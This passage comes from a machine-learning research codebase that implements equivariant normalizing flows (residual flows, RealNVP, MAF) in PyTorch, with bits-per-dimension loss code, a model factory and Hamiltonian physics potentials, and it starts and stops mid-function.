x, logpu = add_padding(args, x, nvals)
if args.squeeze_first:
x = squeeze_layer(x)
z, delta_logp = self.forward(x.view(-1, *args.input_size[1:]), 0)
# log p(z)
# logpz = standard_normal_logprob(z).view(z.size(0), -1).sum(1, keepdim=True)
# log p(x)
logpx = logpz - beta * delta_logp - np.log(nvals) * (
args.imagesize * args.imagesize * (args.im_dim + args.padding)
) - logpu
return logpx
def compute_avg_test_loss(self, args, r2_act, data, beta=1.):
_, c, h, w = data.shape
input_type = enn.FieldType(r2_act, self.c*[r2_act.trivial_repr])
bits_per_dim, logits_tensor = torch.zeros(1).to(data), torch.zeros(args.n_classes).to(data)
logpz, delta_logp = torch.zeros(1).to(data), torch.zeros(1).to(data)
logpx_list = []
data = enn.GeometricTensor(data.cpu(), self.input_type)
if args.dataset == 'celeba_5bit':
nvals = 32
elif args.dataset == 'celebahq':
nvals = 2**args.nbits
else:
nvals = 256
for g in r2_act.testing_elements:
x_transformed = data.transform(g).tensor.view(-1, c, h, w).cuda()
padded_inputs, logpu = add_padding(args, x_transformed, nvals)
z, delta_logp = self.forward(padded_inputs.view(-1, *args.input_size[1:]), 0)
logpz = self.prior.log_prob(z).view(z.size(0), -1).sum(1, keepdim=True)
# logpz = standard_normal_logprob(z).view(z.size(0), -1).sum(1, keepdim=True)
# log p(x)
logpx = logpz - beta * delta_logp - np.log(nvals) * (
args.imagesize * args.imagesize * (args.im_dim + args.padding)
) - logpu
logpx_list.append(logpx)
logpx_total = torch.vstack(logpx_list)
bits_per_dim = -torch.mean(logpx_total) / (args.imagesize *
args.imagesize * args.im_dim) / np.log(2)
return bits_per_dim
def compute_loss(self, args, x, beta=1.0, do_test=False):
if do_test:
# ipdb.set_trace()
return self.compute_avg_test_loss(args, self.group_action_type, x)
bits_per_dim, logits_tensor = torch.zeros(1).to(x), torch.zeros(args.n_classes).to(x)
logpz, delta_logp = torch.zeros(1).to(x), torch.zeros(1).to(x)
# ipdb.set_trace()
if args.dataset == 'celeba_5bit':
nvals = 32
elif args.dataset == 'celebahq':
nvals = 2**args.nbits
else:
nvals = 256
x, logpu = add_padding(args, x, nvals)
if args.squeeze_first:
x = squeeze_layer(x)
if args.task == 'hybrid':
z_logp, logits_tensor = self.forward(x.view(-1, *args.input_size[1:]), 0, classify=True)
z, delta_logp = z_logp
elif args.task == 'density':
z, delta_logp = self.forward(x.view(-1, *args.input_size[1:]), 0)
elif args.task == 'classification':
z, logits_tensor = self.forward(x.view(-1, *args.input_size[1:]), classify=True)
if args.task in ['density', 'hybrid']:
# log p(z)
# z = torch.clip(z, -1e-8, 1. + 1e-8)
# logpz = self.uniform_prior.log_prob(z).sum(1, keepdim=True)
# ipdb.set_trace()
# logpz = self.prior.log_prob(z).view(z.size(0), -1).sum(1, keepdim=True)
logpz = standard_normal_logprob(z).view(z.size(0), -1).sum(1, keepdim=True)
# log p(x)
logpx = logpz - beta * delta_logp - np.log(nvals) * (
args.imagesize * args.imagesize * (args.im_dim + args.padding)
) - logpu
bits_per_dim = -torch.mean(logpx) / (args.imagesize *
args.imagesize * args.im_dim) / np.log(2)
logpz = torch.mean(logpz).detach()
delta_logp = torch.mean(-delta_logp).detach()
return bits_per_dim, logits_tensor, logpz, delta_logp, z
def update_lipschitz(self, n_iterations=5):
with torch.no_grad():
for m in self.modules():
# if isinstance(m, base_layers.SpectralNormConv2d) or isinstance(m, base_layers.SpectralNormLinear):
# m.compute_weight(update=True)
if isinstance(m, base_layers.InducedNormEquivarConv2d) or isinstance(m, base_layers.InducedNormLinear):
m.compute_weight(update=True, n_iterations=n_iterations)
def get_svd_constants(self):
lipschitz_constants = []
for m in self.modules():
if isinstance(m, layers.base.r2_conv.MyR2Conv):
lipschitz_constants.append(m.compute_svd())
return lipschitz_constants
def get_lipschitz_constants(self):
lipschitz_constants = []
for m in self.modules():
if isinstance(m, base_layers.SpectralNormConv2d) or isinstance(m, base_layers.SpectralNormLinear):
lipschitz_constants.append(m.scale)
if isinstance(m, base_layers.InducedNormEquivarConv2d) or isinstance(m, base_layers.InducedNormLinear):
lipschitz_constants.append(m.scale)
if isinstance(m, base_layers.LopConv2d) or isinstance(m, base_layers.LopLinear):
lipschitz_constants.append(m.scale)
if isinstance(m, layers.base.r2_conv.MyR2Conv):
lipschitz_constants.append(m.scale)
return lipschitz_constants
def compute_p_grads(self):
scales = 0.
nlayers = 0
for m in self.modules():
if isinstance(m, base_layers.InducedNormConv2d) or isinstance(m, base_layers.InducedNormLinear):
scales = scales + m.compute_one_iter()
nlayers += 1
scales.mul(1 / nlayers).backward()
for m in self.modules():
if isinstance(m, base_layers.InducedNormConv2d) or isinstance(m, base_layers.InducedNormLinear):
if m.domain.grad is not None and torch.isnan(m.domain.grad):
m.domain.grad = None
class StackediResBlocks(layers.SequentialFlow):
def __init__(
self,
in_type,
out_type,
group_action_type,
initial_size,
idim,
squeeze=True,
init_layer=None,
n_blocks=1,
quadratic=False,
actnorm=False,
fc_actnorm=False,
batchnorm=False,
dropout=0,
fc=False,
coeff=0.9,
vnorms='122f',
n_lipschitz_iters=None,
sn_atol=None,
sn_rtol=None,
n_power_series=5,
n_dist='geometric',
n_samples=1,
kernels='3-1-3',
activation_fn='elu',
fc_end=False,
fc_nblocks=4,
fc_idim=128,
n_exact_terms=0,
preact=False,
neumann_grad=True,
grad_in_forward=True,
first_resblock=False,
learn_p=False,
):
chain = []
# Parse vnorms
ps = []
for p in vnorms:
if p == 'f':
ps.append(float('inf'))
else:
ps.append(float(p))
domains, codomains = ps[:-1], ps[1:]
assert len(domains) == len(kernels.split('-'))
def _actnorm(size, fc):
if fc:
return FCWrapper(layers.EquivariantActNorm1d(size[0] * size[1] * size[2]))
else:
return layers.EquivariantActNorm2d(size)
# return layers.EquivariantActNorm2d(size[0]*size[1]*size[2])
def _quadratic_layer(initial_size, fc):
if fc:
c, h, w = initial_size
dim = c * h * w
return FCWrapper(layers.InvertibleLinear(dim))
else:
return layers.InvertibleConv2d(initial_size[0])
def _lipschitz_layer():
return base_layers.get_equivar_conv2d
def _resblock(initial_size, fc, idim=idim, first_resblock=False,
last_fc_block=False):
if fc:
return layers.Equivar_iResBlock(
FCNet(
in_type,
out_type,
group_action_type,
input_shape=initial_size,
idim=idim,
lipschitz_layer=_lipschitz_layer(),
nhidden=len(kernels.split('-')) - 1,
coeff=coeff,
domains=domains,
codomains=codomains,
n_iterations=n_lipschitz_iters,
activation_fn=activation_fn,
preact=preact,
dropout=dropout,
sn_atol=sn_atol,
sn_rtol=sn_rtol,
learn_p=learn_p,
last_fc_block=last_fc_block,
),
n_power_series=n_power_series,
n_dist=n_dist,
n_samples=n_samples,
n_exact_terms=n_exact_terms,
neumann_grad=neumann_grad,
grad_in_forward=grad_in_forward,
)
else:
ks = list(map(int, kernels.split('-')))
if learn_p:
_domains = [nn.Parameter(torch.tensor(0.)) for _ in range(len(ks))]
_codomains = _domains[1:] + [_domains[0]]
else:
_domains = domains
_codomains = codomains
nnet = []
if not first_resblock and preact:
if batchnorm: nnet.append(layers.MovingBatchNorm2d(initial_size[0]))
# nnet.append(activation_fn(in_type, inplace=True))
nnet.append(
_lipschitz_layer()(
in_type, out_type, group_action_type,
ks[0], 1, ks[0] // 2, coeff=coeff, n_iterations=n_lipschitz_iters,
domain=_domains[0], codomain=_codomains[0], atol=sn_atol, rtol=sn_rtol
)
)
if batchnorm: nnet.append(layers.MovingBatchNorm2d(idim))
# nnet.append(activation_fn(True))
nnet.append(activation_fn(nnet[-1].out_type, inplace=True))
for i, k in enumerate(ks[1:-1]):
nnet.append(
_lipschitz_layer()(
nnet[-1].out_type, out_type, group_action_type,
k, 1, k // 2, coeff=coeff, n_iterations=n_lipschitz_iters,
domain=_domains[i + 1], codomain=_codomains[i + 1], atol=sn_atol, rtol=sn_rtol
)
)
if batchnorm: nnet.append(layers.MovingBatchNorm2d(idim))
nnet.append(activation_fn(nnet[-1].out_type, inplace=True))
# nnet.append(activation_fn(True))
if dropout: nnet.append(nn.Dropout2d(dropout, inplace=True))
nnet.append(
_lipschitz_layer()(
nnet[-1].out_type, in_type, group_action_type,
ks[-1], 1, ks[-1] // 2, coeff=coeff, n_iterations=n_lipschitz_iters,
domain=_domains[-1], codomain=_codomains[-1], atol=sn_atol, rtol=sn_rtol
)
)
if batchnorm: nnet.append(layers.MovingBatchNorm2d(initial_size[0]))
return layers.Equivar_iResBlock(
nn.Sequential(*nnet),
n_power_series=n_power_series,
n_dist=n_dist,
n_samples=n_samples,
n_exact_terms=n_exact_terms,
neumann_grad=neumann_grad,
grad_in_forward=grad_in_forward,
)
if init_layer is not None: chain.append(init_layer)
if first_resblock and actnorm: chain.append(_actnorm(initial_size[0], fc))
if first_resblock and fc_actnorm: chain.append(_actnorm(initial_size, True))
if squeeze:
c, h, w = initial_size
for i in range(n_blocks):
if quadratic: chain.append(_quadratic_layer(initial_size, fc))
chain.append(_resblock(initial_size, fc, first_resblock=first_resblock and (i == 0)))
act_norm_size = len(chain[-1].nnet[-1].out_type)
if actnorm: chain.append(_actnorm(act_norm_size, fc))
if fc_actnorm: chain.append(_actnorm(act_norm_size, True))
chain.append(layers.EquivariantSqueezeLayer(2))
else:
for _ in range(n_blocks):
if quadratic: chain.append(_quadratic_layer(initial_size, fc))
chain.append(_resblock(initial_size, fc))
act_norm_size = len(chain[-1].nnet[-1].out_type)
if actnorm: chain.append(_actnorm(act_norm_size, fc))
if fc_actnorm: chain.append(_actnorm(act_norm_size, True))
# Use four fully connected layers at the end.
if fc_end:
for _ in range(fc_nblocks):
                if _ == fc_nblocks - 1:
chain.append(_resblock(initial_size, True, fc_idim,
last_fc_block=True))
else:
chain.append(_resblock(initial_size, True, fc_idim))
act_norm_size = len(chain[-1].nnet[-1].out_type)
if actnorm or fc_actnorm: chain.append(_actnorm(act_norm_size, True))
super(StackediResBlocks, self).__init__(chain)
class FCNet(nn.Module):
def __init__(self, in_type, out_type, group_action_type, input_shape,
idim, lipschitz_layer, nhidden, coeff, domains, codomains,
n_iterations, activation_fn, preact, dropout, sn_atol,
sn_rtol, learn_p, last_fc_block=False, div_in=1):
super(FCNet, self).__init__()
self.input_shape = input_shape
c, h, w = self.input_shape
dim = c * h * w
nnet = []
last_type = in_type
if preact: nnet.append(activation_fn(in_type, True))
if learn_p:
domains = [nn.Parameter(torch.tensor(0.)) for _ in range(len(domains))]
codomains = domains[1:] + [domains[0]]
for i in range(nhidden):
nnet.append(lipschitz_layer(last_type, out_type, group_action_type,
kernel_size=3, stride=1, padding=1,
coeff=coeff, n_iterations=n_iterations,
domain=domains[i],
codomain=codomains[i], atol=sn_atol,
rtol=sn_rtol))
nnet.append(activation_fn(nnet[-1].out_type, inplace=True))
last_type = nnet[-1].out_type
if dropout: nnet.append(nn.Dropout(dropout, inplace=True))
nnet.append(lipschitz_layer(last_type, in_type, group_action_type,
kernel_size=3, stride=1, padding=1,
coeff=coeff, n_iterations=n_iterations,
domain=domains[-1], codomain=codomains[-1],
atol=sn_atol, rtol=sn_rtol))
if not last_fc_block:
nnet.append(activation_fn(nnet[-1].out_type, inplace=True))
self.nnet = nn.Sequential(*nnet)
def forward(self, x):
return self.nnet(x)
class FCWrapper(nn.Module):
def __init__(self, fc_module):
super(FCWrapper, self).__init__()
self.fc_module = fc_module
def forward(self, x, logpx=None):
shape = x.shape
x = x.view(x.shape[0], -1)
if logpx is None:
y = self.fc_module(x)
return y.view(*shape)
else:
y, logpy = self.fc_module(x, logpx)
return y.view(*shape), logpy
def inverse(self, y, logpy=None):
shape = y.shape
y = y.view(y.shape[0], -1)
if logpy is None:
x = self.fc_module.inverse(y)
return x.view(*shape)
else:
x, logpx = self.fc_module.inverse(y, logpy)
return x.view(*shape), logpx
```
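The `compute_loss` and `compute_avg_test_loss` methods above report results in bits per dimension by rescaling the log-likelihood of the dequantized, padded input. Below is a minimal standalone sketch of that conversion; the tensor values are made up, the helper name `bits_per_dim` is ours, and none of the equivariant machinery is needed.

```python
import torch
import numpy as np

def bits_per_dim(logpx, imagesize, im_dim):
    # logpx: (batch, 1) log-density per image in nats.
    # Dividing by the number of dimensions and by log(2) converts
    # nats per image into bits per pixel channel.
    n_dims = imagesize * imagesize * im_dim
    return -torch.mean(logpx) / n_dims / np.log(2)

# Made-up numbers: 32x32x3 images whose log-likelihood is -7000 nats each.
logpx = torch.full((4, 1), -7000.0)
print(bits_per_dim(logpx, imagesize=32, im_dim=3))  # ~3.29 bits/dim
```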
#### File: Equivariant-Discrete-Flows/flows/flows.py
```python
import torch
import torch.nn as nn
import numpy as np
import torch.nn.functional as F
from torch.distributions import Normal
from torch import distributions
from torch.nn.parameter import Parameter
import ipdb
from sklearn import cluster, datasets, mixture
from sklearn.preprocessing import StandardScaler
from flows.flow_helpers import *
from nflows.flows.base import Flow
from nflows.distributions.normal import StandardNormal
from nflows.transforms.base import CompositeTransform
from nflows.transforms.autoregressive import MaskedAffineAutoregressiveTransform
from nflows.transforms.permutations import ReversePermutation
from nflows.flows import realnvp
from e2cnn import gspaces
from e2cnn import nn as enn
import flows.layers.base as base_layers
import flows.layers as layers
ACTIVATION_FNS = {
'relu': torch.nn.ReLU,
'tanh': torch.nn.Tanh,
'elu': torch.nn.ELU,
'selu': torch.nn.SELU,
'fullsort': base_layers.FullSort,
'maxmin': base_layers.MaxMin,
'swish': base_layers.Swish,
'lcube': base_layers.LipschitzCube,
}
GROUPS = {
'fliprot16': gspaces.FlipRot2dOnR2(N=16),
'fliprot12': gspaces.FlipRot2dOnR2(N=12),
'fliprot8': gspaces.FlipRot2dOnR2(N=8),
'fliprot4': gspaces.FlipRot2dOnR2(N=4),
'fliprot2': gspaces.FlipRot2dOnR2(N=2),
'flip': gspaces.Flip2dOnR2(),
'rot16': gspaces.Rot2dOnR2(N=16),
'rot12': gspaces.Rot2dOnR2(N=12),
'rot8': gspaces.Rot2dOnR2(N=8),
'rot4': gspaces.Rot2dOnR2(N=4),
'rot2': gspaces.Rot2dOnR2(N=2),
'so2': gspaces.Rot2dOnR2(N=-1, maximum_frequency=10),
'o2': gspaces.FlipRot2dOnR2(N=-1, maximum_frequency=10),
}
def standard_normal_logprob(z):
logZ = -0.5 * math.log(2 * math.pi)
return logZ - z.pow(2) / 2
def add_padding(args, x, nvals=256):
# Theoretically, padding should've been added before the add_noise preprocessing.
# nvals takes into account the preprocessing before padding is added.
if args.padding > 0:
if args.padding_dist == 'uniform':
u = x.new_empty(x.shape[0], args.padding, x.shape[2], x.shape[3]).uniform_()
logpu = torch.zeros_like(u).sum([1, 2, 3]).view(-1, 1)
return torch.cat([x, u / nvals], dim=1), logpu
elif args.padding_dist == 'gaussian':
u = x.new_empty(x.shape[0], args.padding, x.shape[2], x.shape[3]).normal_(nvals / 2, nvals / 8)
logpu = normal_logprob(u, nvals / 2, math.log(nvals / 8)).sum([1, 2, 3]).view(-1, 1)
return torch.cat([x, u / nvals], dim=1), logpu
else:
raise ValueError()
elif args.double_padding:
x = x.repeat(1, 2, 1, 1)
return x, torch.zeros(x.shape[0], 1).to(x)
else:
return x, torch.zeros(x.shape[0], 1).to(x)
#Reference: https://github.com/ritheshkumar95/pytorch-normalizing-flows/blob/master/modules.py
LOG_SIG_MAX = 2
LOG_SIG_MIN = -20
epsilon = 1e-6
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
def weights_init_(m):
classname = m.__class__.__name__
if classname.find('Linear') != -1:
torch.nn.init.xavier_uniform_(m.weight, gain=1)
torch.nn.init.constant_(m.bias, 0)
def toy_flow(args, n_blocks, input_dim, hidden_dim, num_layers):
base_dist = StandardNormal(shape=[input_dim])
transforms = []
for _ in range(num_layers):
transforms.append(ReversePermutation(features=input_dim))
transforms.append(MaskedAffineAutoregressiveTransform(features=input_dim,
hidden_features=hidden_dim))
transform = CompositeTransform(transforms)
flow = Flow(transform, base_dist)
return flow
def package_realnvp(args, n_blocks, input_dim, hidden_dim, num_layers):
flow = realnvp.SimpleRealNVP(features=input_dim,
hidden_features=hidden_dim,
num_layers=num_layers,
num_blocks_per_layer=n_blocks)
return flow
# All code below this line is taken from
# https://github.com/kamenbliznashki/normalizing_flows/blob/master/maf.py
## Taken from: https://github.com/senya-ashukha/real-nvp-pytorch/blob/master/real-nvp-pytorch.ipynb
class FlowSequential(nn.Sequential):
""" Container for layers of a normalizing flow """
def forward(self, x, y):
sum_log_abs_det_jacobians = 0
i = len(self)
for module in self:
x, log_abs_det_jacobian = module(x, y)
sum_log_abs_det_jacobians = sum_log_abs_det_jacobians + log_abs_det_jacobian
i -= 1
return x, sum_log_abs_det_jacobians
def inverse(self, u, y):
i = 0
sum_log_abs_det_jacobians = 0
for module in reversed(self):
u, log_abs_det_jacobian = module.inverse(u, y)
sum_log_abs_det_jacobians = sum_log_abs_det_jacobians + log_abs_det_jacobian
i += 1
return u, sum_log_abs_det_jacobians
# --------------------
# Models
# --------------------
class MAFRealNVP(nn.Module):
def __init__(self, args, n_blocks, input_size, hidden_size, n_hidden,
radius=torch.Tensor([0]), cond_label_size=None, batch_norm=False):
super().__init__()
# base distribution for calculation of log prob under the model
self.register_buffer('base_dist_mean', torch.zeros(input_size))
self.register_buffer('base_dist_var', torch.ones(input_size))
self.p_z = StandardNormal
self.radius = radius
# construct model
modules = []
mask = torch.arange(input_size).float() % 2
for i in range(n_blocks):
modules += [LinearMaskedCoupling(input_size, hidden_size, n_hidden, mask, cond_label_size)]
mask = 1 - mask
# modules += batch_norm * [BatchNorm(input_size)]
self.net = FlowSequential(*modules)
@property
def base_dist(self):
return D.Normal(self.base_dist_mean, self.base_dist_var)
def forward(self, x, y=None):
return self.net(x, y)
def inverse(self, u, y=None):
return self.net.inverse(u, y)
def log_prob(self, inputs, y=None):
u, sum_log_abs_det_jacobians = self.forward(inputs, y)
return torch.sum(self.base_dist.log_prob(u) + sum_log_abs_det_jacobians, dim=1)
## Taken from: https://github.com/senya-ashukha/real-nvp-pytorch/blob/master/real-nvp-pytorch.ipynb
class RealNVP(nn.Module):
def __init__(self, args, n_blocks, input_size, hidden_size, n_hidden,
layer_type='Conv'):
super(RealNVP, self).__init__()
_, self.c, self.h, self.w = input_size[:]
# mask_size = self.c * self.h * self.w
# mask = torch.arange(mask_size).float() % 2
self.group_action_type = GROUPS[args.group]
self.out_fiber = args.out_fiber
self.field_type = args.field_type
self.group_card = len(list(self.group_action_type.testing_elements))
self.input_type = enn.FieldType(self.group_action_type, self.c*[self.group_action_type.trivial_repr])
self.n_blocks = int(n_blocks)
self.n_hidden = n_hidden
self.layer_type = layer_type
checkerboard = [[((i % 2) + j) % 2 for j in range(self.w)] for i in range(self.h)]
mask = torch.tensor(checkerboard).float()
# Reshape to (1, 1, height, width) for broadcasting with tensors of shape (B, C, H, W)
mask = mask.view(1, 1, self.h, self.w)
self.dev = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
i_mask = 1 - mask
mask = torch.vstack([mask,i_mask]).repeat(int(self.n_blocks/2), 1, 1, 1)
self.p_z = StandardNormal
self.s, self.t = create_real_nvp_blocks(self.c, hidden_size,
self.n_blocks, n_hidden, layer_type)
self.mask = nn.Parameter(mask, requires_grad=False)
def inverse(self, z, logpz=None):
z = z.view(-1, self.c, self.h, self.w)
log_det_J, x = z.new_zeros(z.shape[0]), z
for i in range(0,self.n_blocks):
x_ = x*self.mask[i]
s = self.s[i](x_)
t = self.t[i](x_)
x = x_ + (1 - self.mask[i]) * (x * torch.exp(s) + t)
log_det_J += ((1-self.mask[i])*s).sum(dim=(1,2,3)) # log det dx/du
        return x.squeeze() if logpz is None else (x.squeeze(), -1 * log_det_J.view(-1, 1))
def forward(self, x, inverse=False):
if inverse:
return self.inverse(x)
log_det_J, z = x.new_zeros(x.shape[0]), x
for i in reversed(range(0,self.n_blocks)):
z_ = self.mask[i] * z
s = self.s[i](z_)
t = self.t[i](z_)
z = (1 - self.mask[i]) * (z - t) * torch.exp(-s) + z_
log_det_J -= ((1-self.mask[i])*s).sum(dim=(1,2,3))
return z.squeeze(), log_det_J.view(-1, 1)
def log_prob(self, inputs, beta=1.):
z, delta_logp = self.forward(inputs)
logpz = standard_normal_logprob(z).view(z.size(0), -1).sum(1, keepdim=True)
logpx = logpz - beta * delta_logp
return logpx, logpz, -1*delta_logp
# p_z = self.p_z([inputs.shape[-1]])
# return p_z.log_prob(z) + logp
def compute_avg_test_loss(self, args, r2_act, data, beta=1.):
_, c, h, w = data.shape
input_type = enn.FieldType(r2_act, self.c*[r2_act.trivial_repr])
bits_per_dim, logits_tensor = torch.zeros(1).to(data), torch.zeros(args.n_classes).to(data)
logpz, delta_logp = torch.zeros(1).to(data), torch.zeros(1).to(data)
logpx_list = []
data = enn.GeometricTensor(data.cpu(), self.input_type)
if args.dataset == 'celeba_5bit':
nvals = 32
elif args.dataset == 'celebahq':
nvals = 2**args.nbits
else:
nvals = 256
for g in r2_act.testing_elements:
x_transformed = data.transform(g).tensor.view(-1, c, h, w).cuda()
padded_inputs, logpu = add_padding(args, x_transformed, nvals)
_, logpz, delta_logp = self.log_prob(padded_inputs)
# log p(x)
logpx = logpz - beta * delta_logp - np.log(nvals) * (
args.imagesize * args.imagesize * (args.im_dim + args.padding)
) - logpu
logpx_list.append(logpx)
logpx_total = torch.vstack(logpx_list)
bits_per_dim = -torch.mean(logpx_total) / (args.imagesize *
args.imagesize * args.im_dim) / np.log(2)
return bits_per_dim
def compute_loss(self, args, inputs, beta=1., do_test=False):
if do_test:
return self.compute_avg_test_loss(args, self.group_action_type, inputs)
bits_per_dim, logits_tensor = torch.zeros(1).to(inputs), torch.zeros(args.n_classes).to(inputs)
logpz, delta_logp = torch.zeros(1).to(inputs), torch.zeros(1).to(inputs)
if args.dataset == 'celeba_5bit':
nvals = 32
elif args.dataset == 'celebahq':
nvals = 2**args.nbits
else:
nvals = 256
padded_inputs, logpu = add_padding(args, inputs, nvals)
_, logpz, delta_logp = self.log_prob(padded_inputs, beta)
# log p(x)
logpx = logpz - beta * delta_logp - np.log(nvals) * (
args.imagesize * args.imagesize * (args.im_dim + args.padding)
) - logpu
bits_per_dim = -torch.mean(logpx) / (args.imagesize *
args.imagesize * args.im_dim) / np.log(2)
logpz = torch.mean(logpz).detach()
delta_logp = torch.mean(-delta_logp).detach()
return bits_per_dim, logits_tensor, logpz, delta_logp, _
def sample(self, batchSize):
# TODO: Update this method for edge_index
z = self.prior.sample((batchSize, 1))
logp = self.prior.log_prob(z)
x = self.inverse(z)
return x
```
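`RealNVP.forward` and `RealNVP.inverse` above implement checkerboard-masked affine coupling. The sketch below replays a single coupling step with toy tensors to show that the inverse exactly undoes the forward update; `s_net` and `t_net` are stand-ins for the per-block `self.s[i]` / `self.t[i]` networks.

```python
import torch

torch.manual_seed(0)
x = torch.randn(2, 1, 4, 4)
mask = torch.tensor([[((i % 2) + j) % 2 for j in range(4)]
                     for i in range(4)]).float().view(1, 1, 4, 4)
s_net = lambda h: 0.5 * torch.tanh(h)   # bounded log-scale keeps exp(s) well behaved
t_net = lambda h: 0.1 * h

# forward: x -> z (same form as the body of RealNVP.forward)
x_masked = mask * x
s, t = s_net(x_masked), t_net(x_masked)
z = (1 - mask) * (x - t) * torch.exp(-s) + x_masked

# inverse: z -> x (same form as the body of RealNVP.inverse)
z_masked = mask * z
s, t = s_net(z_masked), t_net(z_masked)
x_rec = z_masked + (1 - mask) * (z * torch.exp(s) + t)
print(torch.allclose(x, x_rec, atol=1e-6))  # True
```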
#### File: Equivariant-Discrete-Flows/flows/__init__.py
```python
from typing import Any
from .flows import *
from .equivariant_flows import *
from .toy_resflow import *
from .resflow import *
from .equivariant_resflow import *
from .lie_resflow import *
from .mixed_equivariant_resflow import *
from .invariant_maps import *
import argparse
import ipdb
kwargs_flows = {'MAFRealNVP': MAFRealNVP, 'RealNVP': RealNVP, "Toy": toy_flow,
"Simple":package_realnvp, "toy_resflow": ToyResFlow, "resflow":
ResidualFlow, "E_realnvp": EquivariantRealNVP, "FiberRealNVP":
FiberRealNVP, "E_toy_resflow": EquivariantToyResFlow,
"resflow": ResidualFlow, "E_resflow": EquivariantResidualFlow,
"Mixed_resflow": MixedResidualFlow, "lie_resflow":
LieResidualFlow, "E_convexp": EquivariantConvExp}
def create_flow(arg_parse: argparse.Namespace, model_type: str, *args: Any, **kwargs: Any):
if arg_parse.dataset in ["8gaussians", "2spirals", "checkerboard", "rings",
"pinwheel", "swissroll", "circles", "line", "cos",
"dw4"]:
flow_model = kwargs_flows[model_type](arg_parse, int(arg_parse.n_blocks),
arg_parse.input_size,
arg_parse.hidden_dim,
arg_parse.num_layers).to(arg_parse.dev)
elif 'resflow' not in model_type:
flow_model = kwargs_flows[model_type](arg_parse, arg_parse.n_blocks,
arg_parse.input_size,
arg_parse.hidden_dim,
arg_parse.num_layers).to(arg_parse.dev)
else:
flow_model = kwargs_flows[model_type](
arg_parse,
input_size=arg_parse.input_size,
n_blocks=list(map(int, arg_parse.n_blocks.split('-'))),
intermediate_dim=arg_parse.idim,
factor_out=arg_parse.factor_out,
quadratic=arg_parse.quadratic,
init_layer=arg_parse.init_layer,
actnorm=arg_parse.actnorm,
fc_actnorm=arg_parse.fc_actnorm,
batchnorm=arg_parse.batchnorm,
dropout=arg_parse.dropout,
fc=arg_parse.fc,
coeff=arg_parse.coeff,
vnorms=arg_parse.vnorms,
n_lipschitz_iters=arg_parse.n_lipschitz_iters,
sn_atol=arg_parse.sn_tol,
sn_rtol=arg_parse.sn_tol,
n_power_series=arg_parse.n_power_series,
n_dist=arg_parse.n_dist,
n_samples=arg_parse.n_samples,
kernels=arg_parse.kernels,
activation_fn=arg_parse.act,
fc_end=arg_parse.fc_end,
fc_idim=arg_parse.fc_idim,
n_exact_terms=arg_parse.n_exact_terms,
preact=arg_parse.preact,
neumann_grad=arg_parse.neumann_grad,
grad_in_forward=arg_parse.mem_eff,
first_resblock=arg_parse.first_resblock,
learn_p=arg_parse.learn_p,
classification=arg_parse.task in ['classification', 'hybrid'],
classification_hdim=arg_parse.cdim,
n_classes=arg_parse.n_classes,
block_type=arg_parse.block,
).to(arg_parse.dev)
return flow_model
```
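For the toy-data branch of `create_flow` above, the model is built from a plain `argparse.Namespace`; only the attributes that branch reads need to be set. A usage sketch, assuming the `nflows` dependency is installed and with illustrative attribute values:

```python
import argparse
import torch

args = argparse.Namespace(
    dataset="8gaussians",
    n_blocks=2,
    input_size=2,          # treated as the feature dimension for toy flows
    hidden_dim=64,
    num_layers=4,
    dev=torch.device("cpu"),
)
flow = create_flow(args, model_type="Toy")
x = torch.randn(16, 2)
print(flow.log_prob(x).shape)  # torch.Size([16]) for an nflows Flow
```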
#### File: base/lie_conv/hamiltonian.py
```python
import torch
import torch.nn as nn
import matplotlib.pyplot as plt
import matplotlib.animation as animation
class HamiltonianDynamics(nn.Module):
""" Defines the dynamics given a hamiltonian. If wgrad=True, the dynamics can be backproped."""
def __init__(self,H,wgrad=False):
super().__init__()
self.H = H
self.wgrad=wgrad
self.nfe=0
def forward(self,t,z):
self.nfe+=1
with torch.enable_grad():
z = torch.zeros_like(z, requires_grad=True) + z
D = z.shape[-1]
h = self.H(t,z).sum() # elements in mb are independent, gives mb gradients
rg = torch.autograd.grad(h,z,create_graph=self.wgrad)[0] # riemannian gradient
sg = torch.cat([rg[:,D//2:],-rg[:,:D//2]],dim=-1) # symplectic gradient = SdH
return sg
def EuclideanK(momentums, masses):
""" Shape (bs,n,d), and (bs,n),
standard \sum_n p_n^2/{2m_n} kinetic energy"""
p_sq_norms = momentums.pow(2).sum(-1)
kinetic_energy = (p_sq_norms / masses).sum(-1) / 2
return kinetic_energy
# return (p*(p/m[:,:,None])).sum(-1).sum(-1)/2
def KeplerV(positions, masses):
""" Shape (bs,n,d), and (bs,n),
Gravitational PE: -\sum_{jk} m_jm_k/{\|q_j-q_k\|}"""
grav_const = 1
n = masses.shape[-1]
row_ind, col_ind = torch.tril_indices(n, n, offset=-1)
moments = (masses.unsqueeze(1) * masses.unsqueeze(2))[:, row_ind, col_ind]
pair_diff = (positions.unsqueeze(1) - positions.unsqueeze(2))[:, row_ind, col_ind]
pair_dist = pair_diff.norm(dim=-1) + 1e-8
potential_energy = -grav_const * (moments / pair_dist).sum(-1)
return potential_energy
def KeplerH(z,m):
""" with shapes (bs,2nd)"""
bs, D = z.shape # of ODE dims, 2*num_particles*space_dim
q = z[:,:D//2].reshape(*m.shape,-1)
p = z[:,D//2:].reshape(*m.shape,-1)
potential_energy = KeplerV(q, m)
kinetic_energy = EuclideanK(p, m)
assert potential_energy.shape[0] == bs
assert kinetic_energy.shape[0] == bs
return potential_energy + kinetic_energy
def SpringV(q,k):
""" Potential for a bunch particles connected by springs with kij
Shape (bs,n,d), and (bs,n,n)"""
K = k[:,:,None]*k[:,None,:] #(bs,n,n)
n = K.shape[-1]
radial = (q[:,:,None,:] - q[:,None,:,:]).norm(dim=-1)**2 # (bs, n, n)
potential = .5*(K*radial).sum(-1).sum(-1)
return potential #(bs,n,n) -> (bs)
def SpringH(z,m,k):
""" with shapes (bs,2nd)"""
D = z.shape[-1] # of ODE dims, 2*num_particles*space_dim
q = z[:,:D//2].reshape(*m.shape,-1)
p = z[:,D//2:].reshape(*m.shape,-1)
return EuclideanK(p,m) + SpringV(q,k)
def BallV(q,r):
""" Potential for a bunch of (almost) rigid balls and walls, each ball has radius r"""
n = r.shape[-1]
thresh = 0.1
barrier = lambda dist: .5*(torch.exp(1/(dist-thresh*1.05) - 50*(dist-thresh))).sum(-1)#50*((dist-thresh)**2).sum(-1)#.5*(torch.exp(1/(dist-thresh*1.05))/dist).sum(-1)#1/(dist-thresh*1.05)
separation = (q[:,:,None,:] - q[:,None,:,:]).norm(dim=-1)
sum_r = r[:,:,None]+r[:,None,:]
touching = (separation-sum_r < thresh)
